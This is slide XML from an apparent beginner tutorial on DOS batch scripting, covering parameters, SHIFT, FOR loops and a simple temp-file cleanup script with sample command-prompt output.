            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>If</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>For</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Goto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cls</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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71415" y="4215384"/>
            <a:ext cx="2083925" cy="2083925"/>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79243" y="2452198"/>
            <a:ext cx="4295441" cy="3763407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374375431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IN" dirty="0" smtClean="0"/>
              <a:t>Passing Parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(%0 - %9)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>To understand how parameters work, look at the following script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>ECHO OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>First Parameter is %1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Second Parameter is %2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Third Parameter is %3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>This batch file produces the following result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>C:\windows&gt;batch_file_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>ghi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Parameter is abc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Parameter is def</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Parameter is ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19948990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SHIFT command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>snippet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>of code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>ECHO OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>The first Parameter is %1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	SHIFT</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>The Second Parameter is %1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	SHIFT</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>The Second Parameter is %1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Now execute this batch file from DOS and see what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>happens:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" b="1" dirty="0"/>
              <a:t>C:\windows&gt;batch_file_name abc def ghi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>first Parameter is abc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Second Parameter is def</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Second Parameter is ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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620" y="694639"/>
            <a:ext cx="2237143" cy="1878851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140094660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05161" y="2369839"/>
            <a:ext cx="8281060" cy="3631763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.BAT File:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ECHO OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CD\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CD %1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>DEL %2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>In Command Prompt:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:\windows&gt;batch_file_name windows\temp *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505161" y="893019"/>
            <a:ext cx="7793218" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Disk Clean-up</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t> Utility</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" b="1"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06242" y="2369839"/>
            <a:ext cx="5579979" cy="2412268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316573575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914587" y="2781346"/>
            <a:ext cx="2364750" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOOP</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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84189" y="1401049"/>
            <a:ext cx="2802918" cy="2312948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103853537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The FOR Loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>syntax of the FOR LOOP is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>%%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>PARAMETER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>IN(set) DO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Ex: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>@ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>	CLS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>	FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>%%A IN (abc, def, xyz) DO ECHO %%A</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN"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19672" y="4282151"/>
            <a:ext cx="1905000" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268243048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IN" dirty="0" smtClean="0"/>
              <a:t>Let’s take another example…..</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>.BAT FILE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>@ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>I am going to delete the following files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>%1 %2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Press Ctrl+C to Abort process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	PAUSE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>	FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>%%a IN (%1 %2 ) DO DEL %%a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Killed Files. Mission Accomplished</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>At execution time, the process would be something like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>	C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>:\WINDOWS&gt;batchfilename *.tmp *.bak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>am going to delete the following files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>tmp *.bak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	Press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Ctrl+C to Abort process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	Press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>any key to continue . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	Killed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Files. Mission Accomplished</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800"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62992" y="1065847"/>
            <a:ext cx="1011700" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261869218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201535" y="2758197"/>
            <a:ext cx="962123" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
